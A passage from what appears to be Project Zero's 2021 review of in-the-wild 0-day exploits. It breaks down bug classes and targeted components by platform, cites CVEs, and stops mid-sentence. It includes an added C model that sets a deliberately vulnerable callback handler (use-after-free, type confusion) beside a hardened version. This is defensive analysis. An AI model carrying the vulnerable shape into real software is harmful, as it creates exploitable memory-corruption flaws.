\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPe_J-0Wu9Ap-0n3Yj5BoXiWTnjViyyGasIChhb3juADZosK9nTbyiaWtzuRyjwG3frQNjLsvRMRoQHrFfo1iKa3GjmcuLHqat40GcoechQ16XbhpVGwF7m_TJ0Oucvy3wvm8x0aXbVnJfhkG2FNkxI4cJf5ONBqEYnPxQDUmZChvByLHE8OzSU20N/s1200/image3%287%29.png>)\n\nKudos and thank you to Microsoft, Google Chrome, and Adobe who have been annotating their security bulletins for transparency for multiple years now! 
And thanks to Apache who also annotated their release notes for [CVE-2021-41773](<https://httpd.apache.org/security/vulnerabilities_24.html>) this past year. \n\nIn-the-wild 0-days in Qualcomm and ARM products were annotated as in-the-wild in Android security bulletins, but not in the vendor\u2019s own security advisories.\n\nIt's highly likely that in 2021, there were other 0-days that were exploited in the wild and detected, but vendors did not mention this in their release notes. In 2022, we hope that more vendors start noting when they patch vulnerabilities that have been exploited in-the-wild. Until we\u2019re confident that all vendors are transparently disclosing in-the-wild status, there\u2019s a big question of how many in-the-wild 0-days are discovered, but not labeled publicly by vendors.\n\n# New Year, Old Techniques\n\nWe had a record number of \u201cdata points\u201d in 2021 to understand how attackers are actually using 0-day exploits. A bit surprising to us though, out of all those data points, there was nothing new amongst all this data. 0-day exploits are considered one of the most advanced attack methods an actor can use, so it would be easy to conclude that attackers must be using special tricks and attack surfaces. But instead, the 0-days we saw in 2021 generally followed the same bug patterns, attack surfaces, and exploit \u201cshapes\u201d previously seen in public research. Once \u201c0-day is hard\u201d, we\u2019d expect that to be successful, attackers would have to find new bug classes of vulnerabilities in new attack surfaces using never before seen exploitation methods. In general, that wasn't what the data showed us this year. With two exceptions (described below in the iOS section) out of the 58, everything we saw was pretty \u201c[meh](<https://www.dictionary.com/browse/meh#:~:text=unimpressive%3B%20boring%3A>)\u201d or standard.\n\nOut of the 58 in-the-wild 0-days for the year, 39, or 67% were memory corruption vulnerabilities. 
Memory corruption vulnerabilities have been the standard for attacking software for the last few decades, and they are still how attackers are having success. Within these memory corruption vulnerabilities, the majority also fall into very popular and well-known bug classes:

* 17 use-after-free
* 6 out-of-bounds read & write
* 4 buffer overflow
* 4 integer overflow

In the next sections we’ll dive into each major platform for which we saw in-the-wild 0-days this year. We’ll share the trends and explain why what we saw was pretty unexceptional.

## Chromium (Chrome)

Chromium had a record high number of 0-days detected and disclosed in 2021 with 14. Out of these 14, 10 were renderer remote code execution bugs, 2 were sandbox escapes, 1 was an infoleak, and 1 was used to open a webpage in Android apps other than Google Chrome.

The 14 0-day vulnerabilities were in the following components:

* 6 JavaScript Engine - v8 ([CVE-2021-21148](<https://chromereleases.googleblog.com/2021/02/stable-channel-update-for-desktop_4.html>), [CVE-2021-30551](<https://chromereleases.googleblog.com/2021/02/stable-channel-update-for-desktop_4.html>), [CVE-2021-30563](<https://chromereleases.googleblog.com/2021/07/stable-channel-update-for-desktop.html>), [CVE-2021-30632](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-30632.html>), [CVE-2021-37975](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-37975.html>), [CVE-2021-38003](<https://chromereleases.googleblog.com/2021/10/stable-channel-update-for-desktop_28.html>))
* 2 DOM Engine - Blink ([CVE-2021-21193](<https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop_12.html>) & [CVE-2021-21206](<https://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop.html>))
* 1 WebGL ([CVE-2021-30554](<https://chromereleases.googleblog.com/2021/06/stable-channel-update-for-desktop_17.html>))
* 1 IndexedDB ([CVE-2021-30633](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop.html>))
* 1 webaudio ([CVE-2021-21166](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-21166.html>))
* 1 Portals ([CVE-2021-37973](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop_24.html>))
* 1 Android Intents ([CVE-2021-38000](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-38000.html>))
* 1 Core ([CVE-2021-37976](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop_30.html>))

When we look at the components targeted by these bugs, they’re all attack surfaces seen before in public security research and previous exploits. If anything, there are a few fewer DOM bugs and more targeting other browser components like IndexedDB and WebGL than previously. 13 out of the 14 Chromium 0-days were memory corruption bugs. Similar to last year, most of those memory corruption bugs are use-after-free vulnerabilities.

A couple of the Chromium bugs were even similar to previous in-the-wild 0-days. [CVE-2021-21166](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-21166.html>) is an issue in ScriptProcessorNode::Process() in webaudio where there are insufficient locks, such that buffers are accessible in both the main thread and the audio rendering thread at the same time. [CVE-2019-13720](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2019/CVE-2019-13720.html>) is an in-the-wild 0-day from 2019. It was a vulnerability in ConvolverHandler::Process() in webaudio where there were also insufficient locks, such that a buffer was accessible in both the main thread and the audio rendering thread at the same time.

[CVE-2021-30632](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-30632.html>) is another Chromium in-the-wild 0-day from 2021. It’s a type confusion in the TurboFan JIT in Chromium’s JavaScript engine, v8, where TurboFan fails to deoptimize code after a property map is changed. [CVE-2021-30632](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-30632.html>) in particular deals with code that stores global properties. [CVE-2020-16009](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2020/CVE-2020-16009.html>) was also an in-the-wild 0-day that was due to TurboFan failing to deoptimize code after map deprecation.

## WebKit (Safari)

Prior to 2021, Apple had only acknowledged 1 publicly known in-the-wild 0-day targeting WebKit/Safari, and that was due to sharing by an external researcher. In 2021 there were 7. This makes it hard for us to assess trends or changes, since we don’t have historical samples to go off of. Instead, we’ll look at 2021’s WebKit bugs in the context of other Safari bugs not known to be in-the-wild and other browser in-the-wild 0-days.

The 7 in-the-wild 0-days targeted the following components:

* 4 JavaScript Engine - JavaScriptCore ([CVE-2021-1870](<https://support.apple.com/en-us/HT212146>), [CVE-2021-1871](<https://support.apple.com/en-us/HT212146>), [CVE-2021-30663](<https://support.apple.com/en-us/HT212336>), [CVE-2021-30665](<https://support.apple.com/en-us/HT212336>))
* 1 IndexedDB ([CVE-2021-30858](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-30858.html>))
* 1 Storage ([CVE-2021-30661](<https://support.apple.com/en-us/HT212317>))
* 1 Plugins ([CVE-2021-1879](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1879.html>))

The one semi-surprise is that no DOM bugs were detected and disclosed. In previous years, vulnerabilities in the DOM engine have generally made up 15-20% of the in-the-wild browser 0-days, but none were detected and disclosed for WebKit in 2021.

It would not be surprising if attackers are beginning to shift to other modules, like third-party libraries or things like IndexedDB. These modules may be more promising to attackers going forward because there’s a better chance that the vulnerability exists in multiple browsers or platforms. For example, the webaudio bug in Chromium, [CVE-2021-21166](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-21166.html>), also existed in WebKit and was fixed as [CVE-2021-1844](<https://support.apple.com/en-us/HT212223>), though there was no evidence it was exploited in-the-wild in WebKit. The IndexedDB in-the-wild 0-day that was used against Safari in 2021, [CVE-2021-30858](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-30858.html>), was very, very similar to a [bug fixed in Chromium in January 2020](<https://bugs.chromium.org/p/chromium/issues/detail?id=1032890>).

## Internet Explorer

Since we began tracking in-the-wild 0-days, Internet Explorer has had a pretty consistent number of 0-days each year. 2021 actually tied 2016 for the most in-the-wild Internet Explorer 0-days we’ve ever tracked, even though Internet Explorer’s market share of web browser users continues to decrease.

[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbMTlnGhVLcVL8K20S3s6hSrpyB6kZAA9CWvWNpn1isbEbLFv0c2rs_dPvM0ALT45NtTvyhp8rGehGDRIAEJ6OZYSkk5mezOEoPJOquVXXyHeqrVOvRGEiQHv_J7Je8Itjc5qhwXMCR-E4y79abuxiddCYoeF2VrVakY-L1q82NeMEPjTA0fFC-t8h/s1200/image4%286%29.png>)

So why are we seeing so little change in the number of in-the-wild 0-days despite the change in market share? Internet Explorer is still a ripe attack surface for initial entry into Windows machines, even if the user doesn’t use Internet Explorer as their Internet browser. While the number of 0-days stayed pretty consistent with what we’ve seen in previous years, the components targeted and the delivery methods of the exploits changed. 3 of the 4 0-days seen in 2021 targeted the MSHTML browser engine and were delivered via methods other than the web. Instead they were delivered to targets via Office documents or other file formats.

The four 0-days targeted the following components:

* MSHTML browser engine ([CVE-2021-26411](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-26411.html>), [CVE-2021-33742](<https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2021/CVE-2021-33742.html>), [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>))
* JavaScript Engine - JScript9 ([CVE-2021-34448](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34448>))

For [CVE-2021-26411](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-26411.html>), targets of the campaign initially received a .mht file, which prompted the user to open it in Internet Explorer. Once it was opened in Internet Explorer, the exploit was downloaded and run. [CVE-2021-33742](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-33742.html>) and [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) were delivered to targets via malicious Office documents.

[CVE-2021-26411](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-26411.html>) and [CVE-2021-33742](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-33742.html>) were two common memory corruption bug patterns: a use-after-free, where a user-controlled callback runs between two uses of an object and the user frees the object during that callback, and a buffer overflow.

There were a few different vulnerabilities used in the exploit chain that used [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>), but the one within MSHTML was that as soon as the Office document was opened the payload would run: a CAB file was downloaded, decompressed, and then a function from within a DLL in that CAB was executed. Unlike the previous two MSHTML bugs, this was a logic error in URL parsing rather than a memory corruption bug.

## Windows

Windows is the platform where we’ve seen the most change in components targeted compared with previous years.
However, this shift has been in progress for a few years and was predicted given the end-of-life of Windows 7 in 2020, which is why it’s still not especially novel.

In 2021 there were 10 Windows in-the-wild 0-days targeting 7 different components:

* 2 Enhanced crypto provider ([CVE-2021-31199](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31199>), [CVE-2021-31201](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31201>))
* 2 NTOS kernel ([CVE-2021-33771](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33771>), [CVE-2021-31979](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31979>))
* 2 Win32k ([CVE-2021-1732](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1732.html>), [CVE-2021-40449](<https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/>))
* 1 Windows update medic ([CVE-2021-36948](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36948>))
* 1 SuperFetch ([CVE-2021-31955](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31955>))
* 1 dwmcore.dll ([CVE-2021-28310](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-28310>))
* 1 ntfs.sys ([CVE-2021-31956](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31956>))

The number of different components targeted is the shift from past years. For example, in 2019, 75% of Windows 0-days targeted Win32k, while in 2021 Win32k made up only 20% of the Windows 0-days. The reason this was expected and predicted is that 6 out of 8 of the 0-days that targeted Win32k in 2019 did not target the latest release of Windows 10 at the time; they were targeting older versions. With Windows 10, Microsoft began dedicating more and more resources to locking down the attack surface of Win32k, so as those older versions have hit end-of-life, Win32k has become a less and less attractive attack surface.

Similar to the many Win32k vulnerabilities seen over the years, the two 2021 Win32k in-the-wild 0-days are due to custom user callbacks. The user calls functions that change the state of an object during the callback, and Win32k does not correctly handle those changes. [CVE-2021-1732](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1732.html>) is a type confusion vulnerability due to a user callback in xxxClientAllocWindowClassExtraBytes which leads to out-of-bounds read and write. If NtUserConsoleControl is called during the callback, a flag is set in the window structure to signal that a field is an offset into the kernel heap. xxxClientAllocWindowClassExtraBytes doesn’t check this and writes that field as a user-mode pointer without clearing the flag. The first in-the-wild 0-day detected and disclosed in 2022, [CVE-2022-21882](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2022/CVE-2022-21882.html>), is due to [CVE-2021-1732](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1732.html>) not actually being fixed completely. The attackers found a way to bypass the original patch and still trigger the vulnerability. [CVE-2021-40449](<https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/>) is a use-after-free in NtGdiResetDC due to the object being freed during the user callback.

## iOS/macOS

As discussed in the “More disclosure” section above, 2021 was the first full year that Apple annotated their release notes with the in-the-wild status of vulnerabilities. 5 iOS in-the-wild 0-days were detected and disclosed this year.
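Before moving on to Apple's platforms, it is worth pinning down the one bug shape that the Internet Explorer and Win32k paragraphs above share: kernel or engine code uses an object, calls out into user-controlled code, and then uses the object again as if nothing happened. In the MSHTML use-after-free and in NtGdiResetDC (CVE-2021-40449) the callback freed the object; in xxxClientAllocWindowClassExtraBytes (CVE-2021-1732) the callback changed a flag that redefined what a field meant. The C model below is an added illustration, not code from Project Zero or from Windows. The `kobj` structure, the two callbacks, the outcome codes and `run_scenario` are all constructed for the example and do not reflect Win32k's real layout; a sanitizer-style report stands in for the crash so the demo stays deterministic. It puts the vulnerable handler beside a hardened one that holds its own reference across the call-out and re-validates the object's state before acting on it.

```c
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

/* Outcome of one request. The two FAULT_ codes stand in for what an
 * ASan/KASAN-style sanitizer would report; REFUSED is the hardened handler
 * declining to act on state that changed underneath it. */
enum outcome {
    OUTCOME_OK = 0,
    FAULT_USE_AFTER_FREE = 1,   /* second use of an object the callback released */
    FAULT_TYPE_CONFUSION = 2,   /* user pointer written where an offset is now expected */
    REFUSED = 3
};

/* Hypothetical kernel-side object (constructed; NOT Win32k's real layout).
 * The fields exist only to model the two behaviours the post describes. */
typedef struct {
    int       refcount;
    bool      freed;           /* poisoned rather than really freed, so the demo is well-defined */
    bool      data_is_offset;  /* when set, `data` is a kernel-heap offset, not a user pointer */
    uintptr_t data;
} kobj;

/* Callback into user-controlled code; it may do anything to the object. */
typedef void (*user_callback)(kobj *o);

static void obj_init(kobj *o) {
    memset(o, 0, sizeof *o);
    o->refcount = 1;                      /* the caller's reference */
}

static void obj_release(kobj *o) {
    if (o->refcount > 0 && --o->refcount == 0) {
        o->freed = true;
        o->data  = (uintptr_t)0x41414141u; /* stand-in for junk in a recycled chunk */
    }
}

/* Write a user-mode pointer into `data`, reporting (instead of silently
 * performing) the two corruptions described in the text. */
static enum outcome store_user_ptr(kobj *o, const void *user_ptr) {
    if (o->freed)          return FAULT_USE_AFTER_FREE;
    if (o->data_is_offset) return FAULT_TYPE_CONFUSION;
    o->data = (uintptr_t)user_ptr;
    return OUTCOME_OK;
}

/* Vulnerable shape: use the object, call out to user code, use the object
 * again with no reference held and no re-validation of its state. */
static enum outcome handle_request_buggy(kobj *o, user_callback cb, const void *user_ptr) {
    o->data = 0;                          /* first use */
    cb(o);                                /* user code runs: may release o or flip its flag */
    return store_user_ptr(o, user_ptr);   /* second use, assuming nothing changed */
}

/* Hardened shape: pin the object across the call-out so it cannot be freed
 * underneath us, then re-read every field the callback could have changed
 * before acting on it. */
static enum outcome handle_request_safe(kobj *o, user_callback cb, const void *user_ptr) {
    enum outcome result;
    o->refcount++;                        /* our own reference for the duration of the call */
    o->data = 0;
    cb(o);
    if (o->data_is_offset) {
        result = REFUSED;                 /* semantics changed under us: bail out, don't guess */
    } else {
        result = store_user_ptr(o, user_ptr);
    }
    obj_release(o);                       /* drop our pin; frees only if the callback dropped the caller's ref */
    return result;
}

/* Two constructed callbacks modelling the behaviours in the post. */
static void cb_release_during_callback(kobj *o) { obj_release(o); }
static void cb_mark_data_as_offset(kobj *o)     { o->data_is_offset = true; o->data = 0x20; }

/* Run one scenario on a fresh object and return its outcome. */
static enum outcome run_scenario(bool hardened, user_callback cb) {
    static char user_buffer[16];          /* constructed stand-in for a user-mode address */
    kobj o;
    obj_init(&o);
    return hardened ? handle_request_safe(&o, cb, user_buffer)
                    : handle_request_buggy(&o, cb, user_buffer);
}
```

Running `run_scenario(false, ...)` with each callback yields the two faults the text describes, while the hardened handler completes the release case cleanly (the object is only freed once the handler drops its own pin) and refuses the flag-flip case rather than writing a user pointer over what is now an offset. The second point is the one CVE-2022-21882 underlines: a fix that handles one reachable state change but not another leaves the same shape exploitable, so the check has to cover every field the callback can touch.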

The first publicly known macOS in-the-wild 0-day ([CVE-2021-30869](<https://blog.google/threat-analysis-group/analyzing-watering-hole-campaign-using-macos-exploits/>)) was also found. In this section we’re going to discuss iOS and macOS together because: 1) the two operating systems include similar components, and 2) the sample size for macOS is very small (just this one vulnerability).

[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPGaOlQUGIYyvpDY_M0rGh3JekH4mwXHfN459HYcklg74v4Mfp8j6fgh2SM09mjhA4svdgN_TdSN3R5Bb-DJTHnlo63qnRTsvLs1EZgAE3fBpRtsZhxKhyBNTb_khdS6mNT3EtSHnS_R-TshtHx-gSWnEPpHjmSqO_9Y7JxupGcDKZ0-xwsxgbX6zR/s1200/image6%284%29.png>)

For the 5 total iOS and macOS in-the-wild 0-days, they targeted 3 different attack surfaces:

* IOMobileFrameBuffer ([CVE-2021-30807](<https://support.apple.com/en-us/HT212623>), [CVE-2021-30883](<https://support.apple.com/en-us/HT212846>))
* XNU Kernel ([CVE-2021-1782](<https://support.apple.com/en-us/HT212146>) & [CVE-2021-30869](<https://blog.google/threat-analysis-group/analyzing-watering-hole-campaign-using-macos-exploits/>))
* CoreGraphics ([CVE-2021-30860](<https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html>))
* CommCenter ([FORCEDENTRY sandbox escape](<https://googleprojectzero.blogspot.com/2022/03/forcedentry-sandbox-escape.html>) - CVE requested, not yet assigned)

These 4 attack surfaces are not novel. IOMobileFrameBuffer has been a target of public security research for many years. For example, the Pangu Jailbreak from 2016 used [CVE-2016-4654](<https://www.blackhat.com/docs/us-16/materials/us-16-Wang-Pangu-9-Internals.pdf>), a heap buffer overflow in IOMobileFrameBuffer. IOMobileFrameBuffer manages the screen’s frame buffer. For iPhone 11 (A13) and below, IOMobileFrameBuffer was a kernel driver. Beginning with A14, it runs on a coprocessor, the DCP. It’s a popular attack surface because historically it’s been accessible from sandboxed apps. In 2021 there were two in-the-wild 0-days in IOMobileFrameBuffer. [CVE-2021-30807](<https://support.apple.com/en-us/HT212623>) is an out-of-bounds read and [CVE-2021-30883](<https://support.apple.com/en-us/HT212846>) is an integer overflow, both common memory corruption vulnerabilities. In 2022, we already have another in-the-wild 0-day in IOMobileFrameBuffer, [CVE-2022-22587](<https://support.apple.com/en-us/HT213053>).

One iOS 0-day and the macOS 0-day both exploited vulnerabilities in the XNU kernel, and both vulnerabilities were in code related to XNU’s inter-process communication (IPC) functionality. [CVE-2021-1782](<https://support.apple.com/en-us/HT212146>) exploited a vulnerability in mach vouchers while [CVE-2021-30869](<https://blog.google/threat-analysis-group/analyzing-watering-hole-campaign-using-macos-exploits/>) exploited a vulnerability in mach messages. This is not the first time we’ve seen iOS in-the-wild 0-days, much less public security research, targeting mach vouchers and mach messages. [CVE-2019-6625](<https://support.apple.com/en-us/HT209443>) was exploited as a part of [an exploit chain targeting iOS 11.4.1-12.1.2](<https://googleprojectzero.blogspot.com/2019/08/in-wild-ios-exploit-chain-5.html>) and was also a [vulnerability in mach vouchers](<https://googleprojectzero.blogspot.com/2019/01/voucherswap-exploiting-mig-reference.html>).

Mach messages have also been a popular target for public security research. In 2020 there were two in-the-wild 0-days also in mach messages: [CVE-2020-27932](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2020/CVE-2020-27932.html>) & [CVE-2020-27950](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2020/CVE-2020-27950.html>). This year’s [CVE-2021-30869](<https://blog.google/threat-analysis-group/analyzing-watering-hole-campaign-using-macos-exploits/>) is a pretty close variant to 2020’s [CVE-2020-27